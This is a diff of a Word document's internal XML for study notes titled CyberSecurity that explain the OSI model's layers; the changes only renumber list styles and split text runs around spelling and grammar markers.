     <w:tmpl w:val="9744997E"/>
@@ -12626,7 +13158,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2F756123"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8F9A7344"/>
@@ -12712,7 +13244,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="35D56A6F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="13D67F38"/>
@@ -12798,7 +13330,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3BBA210B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9392F422"/>
@@ -12911,7 +13443,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3C4C7B79"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4F5C0A08"/>
@@ -13024,7 +13556,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="40413435"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="30186B74"/>
@@ -13137,7 +13669,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="42A20738"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5E1240AE"/>
@@ -13250,7 +13782,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="43EF75BB"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="B54C9A6A"/>
@@ -13363,7 +13895,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="466B2C0A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="81CABED2"/>
@@ -13476,7 +14008,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4CFB7364"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="13FCFC6A"/>
@@ -13589,7 +14121,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5103291A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E564C9B0"/>
@@ -13702,7 +14234,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="56746C9B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="93687E9C"/>
@@ -13815,7 +14347,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="58D63FD5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FB7A028A"/>
@@ -13928,7 +14460,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5AEA7BFF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7DFE11AE"/>
@@ -14041,7 +14573,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="64E4550A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6C765CC8"/>
@@ -14154,7 +14686,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6B62602D"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="DD1AA9EC"/>
+    <w:lvl w:ilvl="0" w:tplc="40090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6DA176D3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BE0E9F7C"/>
@@ -14267,7 +14912,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="32" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="782F7235"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="65A04688"/>
@@ -14380,7 +15025,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="33" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7D795EE6"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F3F82F6E"/>
@@ -14494,7 +15139,7 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="23"/>
+    <w:abstractNumId w:val="24"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14524,7 +15169,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="31"/>
+    <w:abstractNumId w:val="33"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14554,7 +15199,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="30"/>
+    <w:abstractNumId w:val="32"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14614,7 +15259,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14644,7 +15289,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="6">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="14"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14674,7 +15319,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="25"/>
+    <w:abstractNumId w:val="26"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14704,7 +15349,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="8">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="21"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14734,7 +15379,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="26"/>
+    <w:abstractNumId w:val="27"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14764,28 +15409,28 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="29"/>
+    <w:abstractNumId w:val="31"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="29"/>
+    <w:abstractNumId w:val="31"/>
   </w:num>
   <w:num w:numId="12">
-    <w:abstractNumId w:val="21"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="13">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="14">
     <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="15">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="16">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="18">
     <w:abstractNumId w:val="8"/>
@@ -14794,7 +15439,7 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="20">
-    <w:abstractNumId w:val="28"/>
+    <w:abstractNumId w:val="29"/>
   </w:num>
   <w:num w:numId="21">
     <w:abstractNumId w:val="6"/>
@@ -14803,16 +15448,16 @@
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="23">
-    <w:abstractNumId w:val="27"/>
+    <w:abstractNumId w:val="28"/>
   </w:num>
   <w:num w:numId="24">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="23"/>
   </w:num>
   <w:num w:numId="25">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="26">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="25"/>
   </w:num>
   <w:num w:numId="27">
     <w:abstractNumId w:val="4"/>
@@ -14821,19 +15466,25 @@
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="29">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="30">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="31">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="32">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="33">
     <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="34">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="35">
+    <w:abstractNumId w:val="30"/>
   </w:num>
 </w:numbering>
 </file>
@@ -19186,6 +19837,7 @@
     <w:rsid w:val="008C31A7"/>
     <w:rsid w:val="00A418DD"/>
     <w:rsid w:val="00BC42A6"/>
+    <w:rsid w:val="00D90DF0"/>
     <w:rsid w:val="00E64DFA"/>
   </w:rsids>
   <m:mathPr>
@@ -19917,7 +20569,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{20D0E798-14F5-49F4-850A-844A16D2A6C1}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{22D67FE3-C5B1-48D0-9DEC-03E6940CB2A6}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/CyberSecurity.docx
+++ b/CyberSecurity.docx
@@ -101,7 +101,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">‘, in the year 1974. It is a 7 layer architecture with each layer having specific functionality to performed. All these 7 layers work collaboratively to transmit the data from one person to another across the globe. </w:t>
+        <w:t xml:space="preserve">‘, in the year 1974. It is a 7 layer architecture with each layer having specific functionality to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>performed</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. All these 7 layers work collaboratively to transmit the data from one person to another across the globe. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -200,8 +218,20 @@
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
         </w:rPr>
-        <w:t>1. Physical Layer (Layer 1) :</w:t>
-      </w:r>
+        <w:t>1. Physical Layer (Layer 1</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>) :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -311,8 +341,18 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t>The functions of the physical layer are :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">The functions of the physical layer </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>are :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -426,7 +466,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Physical layer specifies the way in which the different, devices/nodes are arranged in a network i.e. bus, star or mesh topolgy.</w:t>
+        <w:t xml:space="preserve"> Physical layer specifies the way in which the different, devices/nodes are arranged in a network i.e. bus, star or mesh </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>topolgy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -554,8 +612,20 @@
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
         </w:rPr>
-        <w:t>2. Data Link Layer (DLL) (Layer 2) :</w:t>
-      </w:r>
+        <w:t>2. Data Link Layer (DLL) (Layer 2</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>) :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -581,8 +651,18 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t>Data Link Layer is divided into two sub layers :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Data Link Layer is divided into two sub </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>layers :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -643,7 +723,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Packet received from Network layer is further divided into frames depending on the frame size of NIC(Network Interface Card). DLL also encapsulates Sender and Receiver’s MAC address in the header.</w:t>
+        <w:t xml:space="preserve">Packet received from Network layer is further divided into frames depending on the frame size of </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>NIC(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Network Interface Card). DLL also encapsulates Sender and Receiver’s MAC address in the header.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -734,8 +832,18 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t>The functions of the data Link layer are :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">The functions of the data Link layer </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>are :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -862,7 +970,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> The data rate must be constant on both sides else the data may get corrupted thus , flow control coordinates that amount of data that can be sent before receiving acknowledgement.</w:t>
+        <w:t xml:space="preserve"> The data rate must be constant on both sides else the data may get corrupted </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>thus ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> flow control coordinates that amount of data that can be sent before receiving acknowledgement.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -992,8 +1118,20 @@
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
         </w:rPr>
-        <w:t>3. Network Layer (Layer 3) :</w:t>
-      </w:r>
+        <w:t>3. Network Layer (Layer 3</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>) :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1019,8 +1157,18 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-        <w:t>The functions of the Network layer are :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">The functions of the Network layer </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>are :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1235,8 +1383,20 @@
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
         </w:rPr>
-        <w:t>4. Transport Layer (Layer 4) :</w:t>
-      </w:r>
+        <w:t>4. Transport Layer (Layer 4</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>) :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1386,8 +1546,20 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>• At receiver’s side:</w:t>
-      </w:r>
+        <w:t>• At receiver’s side</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1414,8 +1586,18 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>The functions of the transport layer are :</w:t>
-      </w:r>
+        <w:t xml:space="preserve">The functions of the transport layer </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>are :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1446,7 +1628,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> This layer accepts the message from the (session) layer , breaks the message into smaller units . Each of the segment produced has a header associated with it. The transport layer at the destination station reassembles the message.</w:t>
+        <w:t xml:space="preserve"> This layer accepts the message from the (session) </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>layer ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> breaks the message into smaller units . Each of the segment produced has a header associated with it. The transport layer at the destination station reassembles the message.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1496,8 +1696,18 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
